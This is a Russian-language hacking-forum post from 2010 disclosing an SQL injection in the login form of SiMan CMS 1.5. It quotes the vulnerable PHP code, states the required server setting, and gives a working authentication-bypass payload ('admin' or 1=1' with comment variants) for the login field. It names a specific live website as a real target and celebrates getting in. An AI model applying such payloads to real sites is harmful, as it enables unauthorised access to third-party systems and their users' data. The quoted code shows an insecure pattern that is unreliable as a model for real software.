ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Энциклопедия уязвимых скриптов
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Siman!
  #11  
Старый 26.03.2010, 18:31
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию Siman!
Продукт SiMan CMS 1.5

скачать тут

SQL inj
index.php
PHP код:
...
$_getvars=$_GET;
$_postvars=$_POST;
$_cookievars=$_COOKIE;
$_servervars=$_SERVER;
$_uplfilevars=$_FILES;
... 
PHP код:
...$module=$_getvars["m"];
        $mode=$_getvars["d"];

        $special['sql']['count']=0;

        if (count($_getvars)==0)
            $special['is_index_page']=1;

        if (empty($module) || strpos($module':') || strpos($module'.') || strpos($module'/') || strpos($module'\\'))... 
PHP код:
...if ($module<>'404') include('modules/'.$module.'.php');... 
/modules/account.php
PHP код:
...$modules[$modules_index]["module"]='account';
        $modules[$modules_index]["title"]=$lang["register"];
        $login=$_postvars["p_login"];
        $password=$_postvars["p_password"];
        $password2=$_postvars["p_password2"];... 
PHP код:
...sql="SELECT * FROM ".$tableusersprefix."users WHERE login = '$login'";
            $result=database_db_query($nameDB$sql$lnkDB);
            $u=0;
            while ($row=database_fetch_object($result))
                {
                    if (strcmp($row->login$login)==0)
                        {
                            $u=1;
                        }
                }
            if ($u!=1)
                {
                    include('ext/register.php');
                }
            if ($u==1)... 
Условие:
mg=off

durability and result:
action="index.php?m=account&d=login" , метод post
поле login_d [SQL]
поле passwd_d
Тулим:
login_d = admin' or 1=1/*
разные вариации /*, -- # ... , просто есть beta версия CMS
Мы внутри!

Реальный пример:
http://my-tut.org.ua/index.php?m=account&d=login
login_d admin' or 1=1 --
passwd_d безразницы!
Последний раз редактировалось Strilo4ka; 26.03.2010 в 18:47..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ